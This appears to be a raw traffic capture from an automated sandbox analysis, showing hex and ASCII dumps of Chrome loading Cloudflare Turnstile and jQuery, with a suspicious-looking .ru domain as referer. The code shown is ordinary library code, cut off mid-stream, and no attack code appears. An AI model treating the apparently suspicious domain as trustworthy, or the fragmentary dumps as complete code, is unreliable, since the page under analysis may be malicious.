                                                                                                2025-01-08 13:48:12 UTC1369INData Raw: 28 61 2e 73 69 6e 28 74 2b 31 29 29 7c 30 7d 28 29 3b 65 3d 65 2e 4d 44 35 3d 69 2e 65 78 74 65 6e 64 28 7b 5f 64 6f 52 65 73 65 74 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 74 68 69 73 2e 5f 68 61 73 68 3d 6e 65 77 20 72 2e 69 6e 69 74 28 5b 31 37 33 32 35 38 34 31 39 33 2c 34 30 32 33 32 33 33 34 31 37 2c 32 35 36 32 33 38 33 31 30 32 2c 32 37 31 37 33 33 38 37 38 5d 29 7d 2c 5f 64 6f 50 72 6f 63 65 73 73 42 6c 6f 63 6b 3a 66 75 6e 63 74 69 6f 6e 28 74 2c 65 29 7b 66 6f 72 28 76 61 72 20 72 3d 30 3b 72 3c 31 36 3b 72 2b 2b 29 7b 76 61 72 20 69 3d 65 2b 72 2c 6e 3d 74 5b 69 5d 3b 74 5b 69 5d 3d 31 36 37 31 31 39 33 35 26 28 6e 3c 3c 38 7c 6e 3e 3e 3e 32 34 29 7c 34 32 37 38 32 35 35 33 36 30 26 28 6e 3c 3c 32 34 7c 6e 3e 3e 3e 38 29 7d 76 61 72 20 6f 3d 74 68
                                                                                                Data Ascii: (a.sin(t+1))|0}();e=e.MD5=i.extend({_doReset:function(){this._hash=new r.init([1732584193,4023233417,2562383102,271733878])},_doProcessBlock:function(t,e){for(var r=0;r<16;r++){var i=e+r,n=t[i];t[i]=16711935&(n<<8|n>>>24)|4278255360&(n<<24|n>>>8)}var o=th
                                                                                                2025-01-08 13:48:12 UTC1369INData Raw: 5d 29 2c 6d 3d 43 28 6d 2c 62 2c 78 2c 53 2c 42 2c 34 2c 41 5b 34 30 5d 29 2c 53 3d 43 28 53 2c 6d 2c 62 2c 78 2c 73 2c 31 31 2c 41 5b 34 31 5d 29 2c 78 3d 43 28 78 2c 53 2c 6d 2c 62 2c 68 2c 31 36 2c 41 5b 34 32 5d 29 2c 62 3d 43 28 62 2c 78 2c 53 2c 6d 2c 64 2c 32 33 2c 41 5b 34 33 5d 29 2c 6d 3d 43 28 6d 2c 62 2c 78 2c 53 2c 5f 2c 34 2c 41 5b 34 34 5d 29 2c 53 3d 43 28 53 2c 6d 2c 62 2c 78 2c 67 2c 31 31 2c 41 5b 34 35 5d 29 2c 78 3d 43 28 78 2c 53 2c 6d 2c 62 2c 6b 2c 31 36 2c 41 5b 34 36 5d 29 2c 6d 3d 44 28 6d 2c 62 3d 43 28 62 2c 78 2c 53 2c 6d 2c 61 2c 32 33 2c 41 5b 34 37 5d 29 2c 78 2c 53 2c 73 2c 36 2c 41 5b 34 38 5d 29 2c 53 3d 44 28 53 2c 6d 2c 62 2c 78 2c 75 2c 31 30 2c 41 5b 34 39 5d 29 2c 78 3d 44 28 78 2c 53 2c 6d 2c 62 2c 77 2c 31 35 2c
                                                                                                Data Ascii: ]),m=C(m,b,x,S,B,4,A[40]),S=C(S,m,b,x,s,11,A[41]),x=C(x,S,m,b,h,16,A[42]),b=C(b,x,S,m,d,23,A[43]),m=C(m,b,x,S,_,4,A[44]),S=C(S,m,b,x,g,11,A[45]),x=C(x,S,m,b,k,16,A[46]),m=D(m,b=C(b,x,S,m,a,23,A[47]),x,S,s,6,A[48]),S=D(S,m,b,x,u,10,A[49]),x=D(x,S,m,b,w,15,


                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                5192.168.2.549727104.18.95.414438072C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                TimestampBytes transferredDirectionData
                                                                                                2025-01-08 13:48:12 UTC651OUTGET /turnstile/v0/g/849bfe45bf45/api.js HTTP/1.1
                                                                                                Host: challenges.cloudflare.com
                                                                                                Connection: keep-alive
                                                                                                sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                sec-ch-ua-mobile: ?0
                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                Intervention: <https://www.chromestatus.com/feature/5718547946799104>; level="warning"
                                                                                                sec-ch-ua-platform: "Windows"
                                                                                                Accept: */*
                                                                                                Sec-Fetch-Site: cross-site
                                                                                                Sec-Fetch-Mode: no-cors
                                                                                                Sec-Fetch-Dest: script
                                                                                                Referer: https://ppx.musicstrevbng.ru/
                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                Accept-Language: en-US,en;q=0.9
                                                                                                2025-01-08 13:48:12 UTC471INHTTP/1.1 200 OK
                                                                                                Date: Wed, 08 Jan 2025 13:48:12 GMT
                                                                                                Content-Type: application/javascript; charset=UTF-8
                                                                                                Content-Length: 47521
                                                                                                Connection: close
                                                                                                accept-ranges: bytes
                                                                                                last-modified: Thu, 02 Jan 2025 13:52:36 GMT
                                                                                                cache-control: max-age=31536000, stale-if-error=10800, stale-while-revalidate=31536000, public
                                                                                                access-control-allow-origin: *
                                                                                                cross-origin-resource-policy: cross-origin
                                                                                                Server: cloudflare
                                                                                                CF-RAY: 8feca4d458fc42da-EWR
                                                                                                alt-svc: h3=":443"; ma=86400
                                                                                                2025-01-08 13:48:12 UTC898INData Raw: 22 75 73 65 20 73 74 72 69 63 74 22 3b 28 66 75 6e 63 74 69 6f 6e 28 29 7b 66 75 6e 63 74 69 6f 6e 20 57 74 28 65 2c 72 2c 6e 2c 6f 2c 63 2c 75 2c 67 29 7b 74 72 79 7b 76 61 72 20 68 3d 65 5b 75 5d 28 67 29 2c 6c 3d 68 2e 76 61 6c 75 65 7d 63 61 74 63 68 28 70 29 7b 6e 28 70 29 3b 72 65 74 75 72 6e 7d 68 2e 64 6f 6e 65 3f 72 28 6c 29 3a 50 72 6f 6d 69 73 65 2e 72 65 73 6f 6c 76 65 28 6c 29 2e 74 68 65 6e 28 6f 2c 63 29 7d 66 75 6e 63 74 69 6f 6e 20 48 74 28 65 29 7b 72 65 74 75 72 6e 20 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 72 3d 74 68 69 73 2c 6e 3d 61 72 67 75 6d 65 6e 74 73 3b 72 65 74 75 72 6e 20 6e 65 77 20 50 72 6f 6d 69 73 65 28 66 75 6e 63 74 69 6f 6e 28 6f 2c 63 29 7b 76 61 72 20 75 3d 65 2e 61 70 70 6c 79 28 72 2c 6e 29 3b 66 75 6e 63 74
                                                                                                Data Ascii: "use strict";(function(){function Wt(e,r,n,o,c,u,g){try{var h=e[u](g),l=h.value}catch(p){n(p);return}h.done?r(l):Promise.resolve(l).then(o,c)}function Ht(e){return function(){var r=this,n=arguments;return new Promise(function(o,c){var u=e.apply(r,n);funct
                                                                                                2025-01-08 13:48:12 UTC1369INData Raw: 20 65 7d 66 75 6e 63 74 69 6f 6e 20 41 72 28 65 2c 72 29 7b 76 61 72 20 6e 3d 4f 62 6a 65 63 74 2e 6b 65 79 73 28 65 29 3b 69 66 28 4f 62 6a 65 63 74 2e 67 65 74 4f 77 6e 50 72 6f 70 65 72 74 79 53 79 6d 62 6f 6c 73 29 7b 76 61 72 20 6f 3d 4f 62 6a 65 63 74 2e 67 65 74 4f 77 6e 50 72 6f 70 65 72 74 79 53 79 6d 62 6f 6c 73 28 65 29 3b 72 26 26 28 6f 3d 6f 2e 66 69 6c 74 65 72 28 66 75 6e 63 74 69 6f 6e 28 63 29 7b 72 65 74 75 72 6e 20 4f 62 6a 65 63 74 2e 67 65 74 4f 77 6e 50 72 6f 70 65 72 74 79 44 65 73 63 72 69 70 74 6f 72 28 65 2c 63 29 2e 65 6e 75 6d 65 72 61 62 6c 65 7d 29 29 2c 6e 2e 70 75 73 68 2e 61 70 70 6c 79 28 6e 2c 6f 29 7d 72 65 74 75 72 6e 20 6e 7d 66 75 6e 63 74 69 6f 6e 20 6e 74 28 65 2c 72 29 7b 72 65 74 75 72 6e 20 72 3d 72 21 3d 6e 75
                                                                                                Data Ascii: e}function Ar(e,r){var n=Object.keys(e);if(Object.getOwnPropertySymbols){var o=Object.getOwnPropertySymbols(e);r&&(o=o.filter(function(c){return Object.getOwnPropertyDescriptor(e,c).enumerable})),n.push.apply(n,o)}return n}function nt(e,r){return r=r!=nu
                                                                                                2025-01-08 13:48:12 UTC1369INData Raw: 72 61 79 24 2f 2e 74 65 73 74 28 6e 29 29 72 65 74 75 72 6e 20 61 74 28 65 2c 72 29 7d 7d 66 75 6e 63 74 69 6f 6e 20 41 65 28 65 2c 72 29 7b 72 65 74 75 72 6e 20 42 74 28 65 29 7c 7c 6a 74 28 65 2c 72 29 7c 7c 7a 74 28 65 2c 72 29 7c 7c 71 74 28 29 7d 66 75 6e 63 74 69 6f 6e 20 46 28 65 29 7b 22 40 73 77 63 2f 68 65 6c 70 65 72 73 20 2d 20 74 79 70 65 6f 66 22 3b 72 65 74 75 72 6e 20 65 26 26 74 79 70 65 6f 66 20 53 79 6d 62 6f 6c 21 3d 22 75 6e 64 65 66 69 6e 65 64 22 26 26 65 2e 63 6f 6e 73 74 72 75 63 74 6f 72 3d 3d 3d 53 79 6d 62 6f 6c 3f 22 73 79 6d 62 6f 6c 22 3a 74 79 70 65 6f 66 20 65 7d 66 75 6e 63 74 69 6f 6e 20 55 65 28 65 2c 72 29 7b 76 61 72 20 6e 3d 7b 6c 61 62 65 6c 3a 30 2c 73 65 6e 74 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 69 66 28 75 5b 30
                                                                                                Data Ascii: ray$/.test(n))return at(e,r)}}function Ae(e,r){return Bt(e)||jt(e,r)||zt(e,r)||qt()}function F(e){"@swc/helpers - typeof";return e&&typeof Symbol!="undefined"&&e.constructor===Symbol?"symbol":typeof e}function Ue(e,r){var n={label:0,sent:function(){if(u[0
                                                                                                2025-01-08 13:48:12 UTC1369INData Raw: 74 69 6f 6e 3a 22 54 75 72 6e 73 74 69 6c 65 27 73 20 61 70 69 2e 6a 73 20 77 61 73 20 6c 6f 61 64 65 64 2c 20 62 75 74 20 74 68 65 20 69 66 72 61 6d 65 20 75 6e 64 65 72 20 63 68 61 6c 6c 65 6e 67 65 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 20 63 6f 75 6c 64 20 6e 6f 74 20 62 65 20 6c 6f 61 64 65 64 2e 20 48 61 73 20 74 68 65 20 76 69 73 69 74 6f 72 20 62 6c 6f 63 6b 65 64 20 73 6f 6d 65 20 70 61 72 74 73 20 6f 66 20 63 68 61 6c 6c 65 6e 67 65 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 20 6f 72 20 61 72 65 20 74 68 65 79 20 73 65 6c 66 2d 68 6f 73 74 69 6e 67 20 61 70 69 2e 6a 73 3f 22 7d 3b 76 61 72 20 58 74 3d 33 30 30 30 32 30 3b 76 61 72 20 44 65 3d 33 30 30 30 33 30 3b 76 61 72 20 56 65 3d 33 30 30 30 33 31 3b 76 61 72 20 6a 3b 28 66 75
                                                                                                Data Ascii: tion:"Turnstile's api.js was loaded, but the iframe under challenges.cloudflare.com could not be loaded. Has the visitor blocked some parts of challenges.cloudflare.com or are they self-hosting api.js?"};var Xt=300020;var De=300030;var Ve=300031;var j;(fu
                                                                                                2025-01-08 13:48:12 UTC1369INData Raw: 3d 22 6e 65 76 65 72 22 2c 65 2e 4d 41 4e 55 41 4c 3d 22 6d 61 6e 75 61 6c 22 2c 65 2e 41 55 54 4f 3d 22 61 75 74 6f 22 7d 29 28 4a 7c 7c 28 4a 3d 7b 7d 29 29 3b 76 61 72 20 69 65 3b 28 66 75 6e 63 74 69 6f 6e 28 65 29 7b 65 2e 4e 45 56 45 52 3d 22 6e 65 76 65 72 22 2c 65 2e 4d 41 4e 55 41 4c 3d 22 6d 61 6e 75 61 6c 22 2c 65 2e 41 55 54 4f 3d 22 61 75 74 6f 22 7d 29 28 69 65 7c 7c 28 69 65 3d 7b 7d 29 29 3b 76 61 72 20 58 3b 28 66 75 6e 63 74 69 6f 6e 28 65 29 7b 65 2e 41 4c 57 41 59 53 3d 22 61 6c 77 61 79 73 22 2c 65 2e 45 58 45 43 55 54 45 3d 22 65 78 65 63 75 74 65 22 2c 65 2e 49 4e 54 45 52 41 43 54 49 4f 4e 5f 4f 4e 4c 59 3d 22 69 6e 74 65 72 61 63 74 69 6f 6e 2d 6f 6e 6c 79 22 7d 29 28 58 7c 7c 28 58 3d 7b 7d 29 29 3b 76 61 72 20 70 65 3b 28 66 75
                                                                                                Data Ascii: ="never",e.MANUAL="manual",e.AUTO="auto"})(J||(J={}));var ie;(function(e){e.NEVER="never",e.MANUAL="manual",e.AUTO="auto"})(ie||(ie={}));var X;(function(e){e.ALWAYS="always",e.EXECUTE="execute",e.INTERACTION_ONLY="interaction-only"})(X||(X={}));var pe;(fu
                                                                                                2025-01-08 13:48:12 UTC1369INData Raw: 65 63 75 74 65 22 5d 2c 65 29 7d 76 61 72 20 4b 74 3d 33 30 30 2c 24 74 3d 31 30 3b 66 75 6e 63 74 69 6f 6e 20 79 74 28 65 29 7b 76 61 72 20 72 3d 6e 65 77 20 55 52 4c 53 65 61 72 63 68 50 61 72 61 6d 73 3b 69 66 28 65 2e 70 61 72 61 6d 73 2e 5f 64 65 62 75 67 53 69 74 65 6b 65 79 4f 76 65 72 72 69 64 65 73 26 26 28 65 2e 70 61 72 61 6d 73 2e 5f 64 65 62 75 67 53 69 74 65 6b 65 79 4f 76 65 72 72 69 64 65 73 2e 6f 66 66 6c 61 62 65 6c 21 3d 3d 22 64 65 66 61 75 6c 74 22 26 26 72 2e 73 65 74 28 22 6f 66 66 6c 61 62 65 6c 22 2c 65 2e 70 61 72 61 6d 73 2e 5f 64 65 62 75 67 53 69 74 65 6b 65 79 4f 76 65 72 72 69 64 65 73 2e 6f 66 66 6c 61 62 65 6c 29 2c 65 2e 70 61 72 61 6d 73 2e 5f 64 65 62 75 67 53 69 74 65 6b 65 79 4f 76 65 72 72 69 64 65 73 2e 63 6c 65 61
                                                                                                Data Ascii: ecute"],e)}var Kt=300,$t=10;function yt(e){var r=new URLSearchParams;if(e.params._debugSitekeyOverrides&&(e.params._debugSitekeyOverrides.offlabel!=="default"&&r.set("offlabel",e.params._debugSitekeyOverrides.offlabel),e.params._debugSitekeyOverrides.clea
                                                                                                2025-01-08 13:48:12 UTC1369INData Raw: 69 6e 6e 65 72 57 69 64 74 68 3c 34 30 30 2c 63 3d 65 2e 73 74 61 74 65 3d 3d 3d 49 65 2e 46 41 49 4c 55 52 45 5f 46 45 45 44 42 41 43 4b 7c 7c 65 2e 73 74 61 74 65 3d 3d 3d 49 65 2e 46 41 49 4c 55 52 45 5f 48 41 56 49 4e 47 5f 54 52 4f 55 42 4c 45 53 2c 75 2c 67 3d 4d 28 4e 72 2c 28 75 3d 28 72 3d 65 2e 64 69 73 70 6c 61 79 4c 61 6e 67 75 61 67 65 29 3d 3d 3d 6e 75 6c 6c 7c 7c 72 3d 3d 3d 76 6f 69 64 20 30 3f 76 6f 69 64 20 30 3a 72 2e 74 6f 4c 6f 77 65 72 43 61 73 65 28 29 29 21 3d 3d 6e 75 6c 6c 26 26 75 21 3d 3d 76 6f 69 64 20 30 3f 75 3a 22 6e 6f 6e 65 78 69 73 74 65 6e 74 22 29 2c 68 2c 6c 3d 4d 28 6b 72 2c 28 68 3d 28 6e 3d 65 2e 64 69 73 70 6c 61 79 4c 61 6e 67 75 61 67 65 29 3d 3d 3d 6e 75 6c 6c 7c 7c 6e 3d 3d 3d 76 6f 69 64 20 30 3f 76 6f 69 64
                                                                                                Data Ascii: innerWidth<400,c=e.state===Ie.FAILURE_FEEDBACK||e.state===Ie.FAILURE_HAVING_TROUBLES,u,g=M(Nr,(u=(r=e.displayLanguage)===null||r===void 0?void 0:r.toLowerCase())!==null&&u!==void 0?u:"nonexistent"),h,l=M(kr,(h=(n=e.displayLanguage)===null||n===void 0?void
                                                                                                2025-01-08 13:48:12 UTC1369INData Raw: 75 72 6e 21 31 7d 7d 66 75 6e 63 74 69 6f 6e 20 53 65 28 65 2c 72 2c 6e 29 7b 72 65 74 75 72 6e 20 6a 65 28 29 3f 53 65 3d 52 65 66 6c 65 63 74 2e 63 6f 6e 73 74 72 75 63 74 3a 53 65 3d 66 75 6e 63 74 69 6f 6e 28 63 2c 75 2c 67 29 7b 76 61 72 20 68 3d 5b 6e 75 6c 6c 5d 3b 68 2e 70 75 73 68 2e 61 70 70 6c 79 28 68 2c 75 29 3b 76 61 72 20 6c 3d 46 75 6e 63 74 69 6f 6e 2e 62 69 6e 64 2e 61 70 70 6c 79 28 63 2c 68 29 2c 70 3d 6e 65 77 20 6c 3b 72 65 74 75 72 6e 20 67 26 26 5a 28 70 2c 67 2e 70 72 6f 74 6f 74 79 70 65 29 2c 70 7d 2c 53 65 2e 61 70 70 6c 79 28 6e 75 6c 6c 2c 61 72 67 75 6d 65 6e 74 73 29 7d 66 75 6e 63 74 69 6f 6e 20 63 65 28 65 29 7b 72 65 74 75 72 6e 20 63 65 3d 4f 62 6a 65 63 74 2e 73 65 74 50 72 6f 74 6f 74 79 70 65 4f 66 3f 4f 62 6a 65 63
                                                                                                Data Ascii: urn!1}}function Se(e,r,n){return je()?Se=Reflect.construct:Se=function(c,u,g){var h=[null];h.push.apply(h,u);var l=Function.bind.apply(c,h),p=new l;return g&&Z(p,g.prototype),p},Se.apply(null,arguments)}function ce(e){return ce=Object.setPrototypeOf?Objec
                                                                                                2025-01-08 13:48:12 UTC1369INData Raw: 22 29 3b 74 68 72 6f 77 20 6e 65 77 20 73 72 28 6e 2c 72 29 7d 66 75 6e 63 74 69 6f 6e 20 62 28 65 29 7b 63 6f 6e 73 6f 6c 65 2e 77 61 72 6e 28 22 5b 43 6c 6f 75 64 66 6c 61 72 65 20 54 75 72 6e 73 74 69 6c 65 5d 20 22 2e 63 6f 6e 63 61 74 28 65 29 29 7d 66 75 6e 63 74 69 6f 6e 20 7a 65 28 65 29 7b 72 65 74 75 72 6e 20 65 2e 73 74 61 72 74 73 57 69 74 68 28 48 65 29 3f 65 2e 73 75 62 73 74 72 69 6e 67 28 48 65 2e 6c 65 6e 67 74 68 29 3a 6e 75 6c 6c 7d 66 75 6e 63 74 69 6f 6e 20 51 28 65 29 7b 72 65 74 75 72 6e 22 22 2e 63 6f 6e 63 61 74 28 48 65 29 2e 63 6f 6e 63 61 74 28 65 29 7d 66 75 6e 63 74 69 6f 6e 20 52 74 28 29 7b 76 61 72 20 65 3d 2f 5c 2f 74 75 72 6e 73 74 69 6c 65 5c 2f 76 30 28 5c 2f 2e 2a 29 3f 5c 2f 61 70 69 5c 2e 6a 73 2f 2c 72 3d 64 6f 63
                                                                                                Data Ascii: ");throw new sr(n,r)}function b(e){console.warn("[Cloudflare Turnstile] ".concat(e))}function ze(e){return e.startsWith(He)?e.substring(He.length):null}function Q(e){return"".concat(He).concat(e)}function Rt(){var e=/\/turnstile\/v0(\/.*)?\/api\.js/,r=doc
                                                                                                2025-01-08 13:48:12 UTC1369INData Raw: 72 6d 4f 72 69 67 69 6e 3d 22 63 65 6e 74 65 72 20 63 65 6e 74 65 72 22 2c 6c 2e 73 74 79 6c 65 2e 6f 76 65 72 66 6c 6f 77 58 3d 22 68 69 64 64 65 6e 22 2c 6c 2e 73 74 79 6c 65 2e 6f 76 65 72 66 6c 6f 77 59 3d 22 61 75 74 6f 22 2c 6c 2e 73 74 79 6c 65 2e 62 61 63 6b 67 72 6f 75 6e 64 3d 22 72 67 62 61 28 30 2c 30 2c 30 2c 30 2e 34 29 22 3b 76 61 72 20 70 3d 64 6f 63 75 6d 65 6e 74 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 22 64 69 76 22 29 3b 70 2e 73 74 79 6c 65 2e 64 69 73 70 6c 61 79 3d 22 74 61 62 6c 65 2d 63 65 6c 6c 22 2c 70 2e 73 74 79 6c 65 2e 76 65 72 74 69 63 61 6c 41 6c 69 67 6e 3d 22 6d 69 64 64 6c 65 22 2c 70 2e 73 74 79 6c 65 2e 77 69 64 74 68 3d 22 31 30 30 76 77 22 2c 70 2e 73 74 79 6c 65 2e 68 65 69 67 68 74 3d 22 31 30 30 76 68 22 3b
                                                                                                Data Ascii: rmOrigin="center center",l.style.overflowX="hidden",l.style.overflowY="auto",l.style.background="rgba(0,0,0,0.4)";var p=document.createElement("div");p.style.display="table-cell",p.style.verticalAlign="middle",p.style.width="100vw",p.style.height="100vh";


                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                6192.168.2.549730151.101.66.1374438072C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                TimestampBytes transferredDirectionData
                                                                                                2025-01-08 13:48:13 UTC358OUTGET /jquery-3.6.0.min.js HTTP/1.1
                                                                                                Host: code.jquery.com
                                                                                                Connection: keep-alive
                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                Accept: */*
                                                                                                Sec-Fetch-Site: none
                                                                                                Sec-Fetch-Mode: cors
                                                                                                Sec-Fetch-Dest: empty
                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                Accept-Language: en-US,en;q=0.9
                                                                                                2025-01-08 13:48:13 UTC611INHTTP/1.1 200 OK
                                                                                                Connection: close
                                                                                                Content-Length: 89501
                                                                                                Server: nginx
                                                                                                Content-Type: application/javascript; charset=utf-8
                                                                                                Last-Modified: Fri, 18 Oct 1991 12:00:00 GMT
                                                                                                ETag: "28feccc0-15d9d"
                                                                                                Cache-Control: public, max-age=31536000, stale-while-revalidate=604800
                                                                                                Access-Control-Allow-Origin: *
                                                                                                Cross-Origin-Resource-Policy: cross-origin
                                                                                                Via: 1.1 varnish, 1.1 varnish
                                                                                                Accept-Ranges: bytes
                                                                                                Age: 1828620
                                                                                                Date: Wed, 08 Jan 2025 13:48:13 GMT
                                                                                                X-Served-By: cache-lga21931-LGA, cache-nyc-kteb1890055-NYC
                                                                                                X-Cache: HIT, HIT
                                                                                                X-Cache-Hits: 55, 0
                                                                                                X-Timer: S1736344093.476949,VS0,VE1
                                                                                                Vary: Accept-Encoding
                                                                                                2025-01-08 13:48:13 UTC1378INData Raw: 2f 2a 21 20 6a 51 75 65 72 79 20 76 33 2e 36 2e 30 20 7c 20 28 63 29 20 4f 70 65 6e 4a 53 20 46 6f 75 6e 64 61 74 69 6f 6e 20 61 6e 64 20 6f 74 68 65 72 20 63 6f 6e 74 72 69 62 75 74 6f 72 73 20 7c 20 6a 71 75 65 72 79 2e 6f 72 67 2f 6c 69 63 65 6e 73 65 20 2a 2f 0a 21 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 6d 6f 64 75 6c 65 26 26 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 6d 6f 64 75 6c 65 2e 65 78 70 6f 72 74 73 3f 6d 6f 64 75 6c 65 2e 65 78 70 6f 72 74 73 3d 65 2e 64 6f 63 75 6d 65 6e 74 3f 74 28 65 2c 21 30 29 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 69 66 28 21 65 2e 64 6f 63 75 6d 65 6e 74 29 74 68 72 6f 77 20 6e 65 77 20 45 72 72 6f 72 28 22 6a 51 75
                                                                                                Data Ascii: /*! jQuery v3.6.0 | (c) OpenJS Foundation and other contributors | jquery.org/license */!function(e,t){"use strict";"object"==typeof module&&"object"==typeof module.exports?module.exports=e.document?t(e,!0):function(e){if(!e.document)throw new Error("jQu
                                                                                                2025-01-08 13:48:13 UTC1378INData Raw: 7d 2c 67 65 74 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 72 65 74 75 72 6e 20 6e 75 6c 6c 3d 3d 65 3f 73 2e 63 61 6c 6c 28 74 68 69 73 29 3a 65 3c 30 3f 74 68 69 73 5b 65 2b 74 68 69 73 2e 6c 65 6e 67 74 68 5d 3a 74 68 69 73 5b 65 5d 7d 2c 70 75 73 68 53 74 61 63 6b 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 76 61 72 20 74 3d 53 2e 6d 65 72 67 65 28 74 68 69 73 2e 63 6f 6e 73 74 72 75 63 74 6f 72 28 29 2c 65 29 3b 72 65 74 75 72 6e 20 74 2e 70 72 65 76 4f 62 6a 65 63 74 3d 74 68 69 73 2c 74 7d 2c 65 61 63 68 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 72 65 74 75 72 6e 20 53 2e 65 61 63 68 28 74 68 69 73 2c 65 29 7d 2c 6d 61 70 3a 66 75 6e 63 74 69 6f 6e 28 6e 29 7b 72 65 74 75 72 6e 20 74 68 69 73 2e 70 75 73 68 53 74 61 63 6b 28 53 2e 6d 61 70 28 74 68 69 73 2c 66
                                                                                                Data Ascii: },get:function(e){return null==e?s.call(this):e<0?this[e+this.length]:this[e]},pushStack:function(e){var t=S.merge(this.constructor(),e);return t.prevObject=this,t},each:function(e){return S.each(this,e)},map:function(n){return this.pushStack(S.map(this,f
                                                                                                2025-01-08 13:48:13 UTC1378INData Raw: 6f 6e 28 65 29 7b 76 61 72 20 74 2c 6e 3b 72 65 74 75 72 6e 21 28 21 65 7c 7c 22 5b 6f 62 6a 65 63 74 20 4f 62 6a 65 63 74 5d 22 21 3d 3d 6f 2e 63 61 6c 6c 28 65 29 29 26 26 28 21 28 74 3d 72 28 65 29 29 7c 7c 22 66 75 6e 63 74 69 6f 6e 22 3d 3d 74 79 70 65 6f 66 28 6e 3d 76 2e 63 61 6c 6c 28 74 2c 22 63 6f 6e 73 74 72 75 63 74 6f 72 22 29 26 26 74 2e 63 6f 6e 73 74 72 75 63 74 6f 72 29 26 26 61 2e 63 61 6c 6c 28 6e 29 3d 3d 3d 6c 29 7d 2c 69 73 45 6d 70 74 79 4f 62 6a 65 63 74 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 76 61 72 20 74 3b 66 6f 72 28 74 20 69 6e 20 65 29 72 65 74 75 72 6e 21 31 3b 72 65 74 75 72 6e 21 30 7d 2c 67 6c 6f 62 61 6c 45 76 61 6c 3a 66 75 6e 63 74 69 6f 6e 28 65 2c 74 2c 6e 29 7b 62 28 65 2c 7b 6e 6f 6e 63 65 3a 74 26 26 74 2e 6e 6f
                                                                                                Data Ascii: on(e){var t,n;return!(!e||"[object Object]"!==o.call(e))&&(!(t=r(e))||"function"==typeof(n=v.call(t,"constructor")&&t.constructor)&&a.call(n)===l)},isEmptyObject:function(e){var t;for(t in e)return!1;return!0},globalEval:function(e,t,n){b(e,{nonce:t&&t.no
                                                                                                2025-01-08 13:48:13 UTC1378INData Raw: 5d 2c 71 3d 74 2e 70 6f 70 2c 4c 3d 74 2e 70 75 73 68 2c 48 3d 74 2e 70 75 73 68 2c 4f 3d 74 2e 73 6c 69 63 65 2c 50 3d 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 66 6f 72 28 76 61 72 20 6e 3d 30 2c 72 3d 65 2e 6c 65 6e 67 74 68 3b 6e 3c 72 3b 6e 2b 2b 29 69 66 28 65 5b 6e 5d 3d 3d 3d 74 29 72 65 74 75 72 6e 20 6e 3b 72 65 74 75 72 6e 2d 31 7d 2c 52 3d 22 63 68 65 63 6b 65 64 7c 73 65 6c 65 63 74 65 64 7c 61 73 79 6e 63 7c 61 75 74 6f 66 6f 63 75 73 7c 61 75 74 6f 70 6c 61 79 7c 63 6f 6e 74 72 6f 6c 73 7c 64 65 66 65 72 7c 64 69 73 61 62 6c 65 64 7c 68 69 64 64 65 6e 7c 69 73 6d 61 70 7c 6c 6f 6f 70 7c 6d 75 6c 74 69 70 6c 65 7c 6f 70 65 6e 7c 72 65 61 64 6f 6e 6c 79 7c 72 65 71 75 69 72 65 64 7c 73 63 6f 70 65 64 22 2c 4d 3d 22 5b 5c 5c 78 32 30 5c 5c 74
                                                                                                Data Ascii: ],q=t.pop,L=t.push,H=t.push,O=t.slice,P=function(e,t){for(var n=0,r=e.length;n<r;n++)if(e[n]===t)return n;return-1},R="checked|selected|async|autofocus|autoplay|controls|defer|disabled|hidden|ismap|loop|multiple|open|readonly|required|scoped",M="[\\x20\\t
                                                                                                2025-01-08 13:48:13 UTC1378INData Raw: 2c 65 65 3d 2f 5b 2b 7e 5d 2f 2c 74 65 3d 6e 65 77 20 52 65 67 45 78 70 28 22 5c 5c 5c 5c 5b 5c 5c 64 61 2d 66 41 2d 46 5d 7b 31 2c 36 7d 22 2b 4d 2b 22 3f 7c 5c 5c 5c 5c 28 5b 5e 5c 5c 72 5c 5c 6e 5c 5c 66 5d 29 22 2c 22 67 22 29 2c 6e 65 3d 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 76 61 72 20 6e 3d 22 30 78 22 2b 65 2e 73 6c 69 63 65 28 31 29 2d 36 35 35 33 36 3b 72 65 74 75 72 6e 20 74 7c 7c 28 6e 3c 30 3f 53 74 72 69 6e 67 2e 66 72 6f 6d 43 68 61 72 43 6f 64 65 28 6e 2b 36 35 35 33 36 29 3a 53 74 72 69 6e 67 2e 66 72 6f 6d 43 68 61 72 43 6f 64 65 28 6e 3e 3e 31 30 7c 35 35 32 39 36 2c 31 30 32 33 26 6e 7c 35 36 33 32 30 29 29 7d 2c 72 65 3d 2f 28 5b 5c 30 2d 5c 78 31 66 5c 78 37 66 5d 7c 5e 2d 3f 5c 64 29 7c 5e 2d 24 7c 5b 5e 5c 30 2d 5c 78 31 66 5c
